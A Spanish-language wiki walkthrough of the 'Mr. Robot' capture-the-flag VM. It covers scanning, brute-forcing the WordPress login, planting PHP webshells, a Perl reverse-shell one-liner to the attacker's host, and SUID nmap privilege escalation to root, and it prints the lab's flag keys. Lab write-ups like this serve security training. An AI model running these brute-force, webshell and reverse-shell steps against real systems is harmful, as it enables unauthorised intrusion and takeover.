mr.robot - danielcastropalomares/security GitHub Wiki
Con un primer escaneo vemos que solo tiene abiertos los puertos web, el SSH está cerrado:
root@kali:~# nmap -A 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-12 15:50 CET
Nmap scan report for 172.31.255.128
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:F3:16:D5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.40 ms 172.31.255.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds
root@kali:~# nmap -p- 172.31.255.128
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 08:00:27:F3:16:D5 (Oracle VirtualBox virtual NIC)
Escaneando el directorio web encontramos lo siguiente:
root@kali:/usr/local/src/Osmedeus# cat /usr/local/src/Osmedeus/workspaces/172.31.255.128/directory/172.31.255.128-dirsearch.txt | grep 200
200 1KB http://172.31.255.128:80/admin/
200 1KB http://172.31.255.128:80/admin/?/login
200 1KB http://172.31.255.128:80/admin/index
200 1KB http://172.31.255.128:80/admin/index.html
200 0B http://172.31.255.128:80/favicon.ico
200 1KB http://172.31.255.128:80/index.html
200 504KB http://172.31.255.128:80/intro
200 19KB http://172.31.255.128:80/license.txt
200 10KB http://172.31.255.128:80/readme
200 10KB http://172.31.255.128:80/readme.html
200 41B http://172.31.255.128:80/robots.txt
200 0B http://172.31.255.128:80/sitemap
200 0B http://172.31.255.128:80/sitemap.xml
200 0B http://172.31.255.128:80/sitemap.xml.gz
200 0B http://172.31.255.128:80/wp-config.php
200 0B http://172.31.255.128:80/wp-content/
200 0B http://172.31.255.128:80/wp-content/plugins/google-sitemap-generator/sitemap-core.php
200 3KB http://172.31.255.128:80/wp-login.php
200 3KB http://172.31.255.128:80/wp-login
200 3KB http://172.31.255.128:80/wp-login/
En el robots txt encontramos lo siguiente:
http://172.31.255.128/robots.txt
fsocity.dic
key-1-of-3.txt
El primero es un diccionario:
http://172.31.255.128/fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
http
var
page
Robot
Elliot
styles
and
Y el segundo es la primera key:
http://172.31.255.128/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Escanemos las vulnerabilidades de wordpress y no encontramos nada:
root@kali:~# wpscan --force --wp-content-dir wp-admin --url http://172.31.255.128
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.4.0
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://172.31.255.128/
[+] Started: Sat Dec 22 19:53:44 2018
Interesting Finding(s):
[+] http://172.31.255.128/
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://172.31.255.128/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] http://172.31.255.128/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://172.31.255.128/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.3.18 identified (Latest, released on 2018-12-13).
| Detected By: Rss Generator (Aggressive Detection)
| - http://172.31.255.128/feed/, <generator>https://wordpress.org/?v=4.3.18</generator>
| - http://172.31.255.128/comments/feed/, <generator>https://wordpress.org/?v=4.3.18</generator>
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Sat Dec 22 19:53:46 2018
[+] Requests Done: 22
[+] Cached Requests: 27
[+] Data Sent: 9.665 KB
[+] Data Received: 186.248 KB
[+] Memory used: 47.199 MB
[+] Elapsed time: 00:00:02
Si accedemos al login de wordpress y probamos de acceder con elliot, nos aparece el siguiente mensaje:
http://172.31.255.128/wp-login.php
ERROR: The password you entered for the username elliot is incorrect. Lost your password?
Ahora ya tenemos el usuario, ahora solo nos hace falta el password. Con nmap lanzamos un ataque de bruteforce contra el login de wordpress, utilizando como diccionario de password el fichero "fsocity.dic" y como usuario "user.txt" que contiene el usuario "elliot":
root@kali:/tmp# cat user.txt
elliot
root@kali:/tmp# nmap -sV -p 80 --script http-wordpress-brute -script-args 'passdb=/tmp/fsocity.dic,userdb=/tmp/user.txt' 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 20:08 CET
Nmap scan report for 172.31.255.128
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
| http-wordpress-brute:
| Accounts:
| elliot:ER28-0652 - Valid credentials
|_ Statistics: Performed 11443 guesses in 230 seconds, average tps: 48.5
MAC Address: 08:00:27:F3:16:D5 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.81 seconds
Ahora que tenemos las credenciales ya podemos acceder vía web.Lo que vamos hacer es subir una shell php modificando el archivo 404 Template (404.php), en esta ocasión he utilizado la siguiente:
https://raw.githubusercontent.com/JohnTroony/php-webshells/master/g00nshell-v1.3.php
Appareance > Editor > 404 Template
Una vez guardados los cambios, accederemos vía web al archivo modificado:
http://172.31.255.128/wp-content/themes/twentysixteen/404.php
Esta terminal es muy limitada así que vamos a subir otra, si intentaba hacer un copy paste de la nueva shell directamente en el archivo 404.php no funcionaba. Asi que opte por descargar el archivo directamente desde la shell "g00nshell":
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O wp-content/themes/shell.php
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Accedemos a la shell p0wny-shell:
http://172.31.255.128/wp-content/themes/shell.php
Comprobamos con que usuario hemos accedido:
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Buscamos su home:
grep daemon /etc/passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
El servidor SSH se encuentra instalado, pero no iniciado:
dpkg -l | grep ssh
ii openssh-client 1:6.6p1-2ubuntu2 amd64 secure shell (SSH) client, for secure access to remote machines
ii openssh-server 1:6.6p1-2ubuntu2 amd64 secure shell (SSH) server, for secure access from remote machines
ii openssh-sftp-server 1:6.6p1-2ubuntu2 amd64 secure shell (SSH) sftp server module, for SFTP access from remote machines
ii ssh 1:6.6p1-2ubuntu2 all secure shell client and server (metapackage)
ii ssh-import-id 3.21-0ubuntu1 all securely retrieve an SSH public key and install it locally
netstat -nltp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:21 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2812 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
Si listamos el directorio encontramos el siguiente fichero:
ls -liath
30848 -rw-r--r-- 1 bitnamiftp daemon 33 Nov 13 2015 you-will-never-guess-this-file-name.txt
cat you-will-never-guess-this-file-name.txt
hello there person who found me.
Buscamos binarios con SUID configurado y encontramos nmap:
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
ls -liath /usr/local/bin/nmap
34835 -rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
Ahora ejecutamos una reverse shell, en nuestra máquina Kali ponemos a escuchar un netcat por el puerto 8080:
root@kali:/tmp# nc -vlp 8080
listening on [any] 8080 ...
Desde la máquina víctima ejecutamos:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.31.255.129:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ahora ya tenemos una sesión abierta directamente desde nuestro kali:
root@kali:/tmp# nc -vlp 8080
listening on [any] 8080 ...
172.31.255.128: inverse host lookup failed: Unknown host
connect to [172.31.255.129] from (UNKNOWN) [172.31.255.128] 37278
ls
index.php
shell.php
twentyfifteen
twentyfourteen
twentythirteen
Abrimos una shell en python:
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/themes$
Ejecutamos nmap en modo interactivo, abrimos una shell y verificamos que tenemos permisos de root:
daemon@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/themes$ /usr/local/bin/nmap --interactive
<pps/wordpress/htdocs/wp-content/themes$ /usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
#
En la home del usuario robot encontramos la key 2 de 3:
cd /home/robot
# ls
ls
key-2-of-3.txt password.raw-md5
# ls -liath
ls -liath
total 16K
136109 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
136108 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
130326 drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
22175 drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
# cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
#
Si desencriptamos el password:
c3fcd3d76192e4007dfb496cca67e13b : abcdefghijklmnopqrstuvwxyz
Accedemos al directorio root y encontramos la última key:
cd /root
# pwd
pwd
/root
# ls -liath
ls -liath
total 32K
30845 -rw------- 1 root root 4.0K Nov 14 2015 .bash_history
33954 drwx------ 3 root root 4.0K Nov 13 2015 .
55578 -rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
34802 -r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
394264 drwx------ 2 root root 4.0K Nov 13 2015 .cache
2 drwxr-xr-x 22 root root 4.0K Sep 16 2015 ..
35943 -rw-r--r-- 1 root root 3.2K Sep 16 2015 .bashrc
34851 -rw------- 1 root root 1.0K Sep 16 2015 .rnd
35944 -rw-r--r-- 1 root root 140 Feb 20 2014 .profile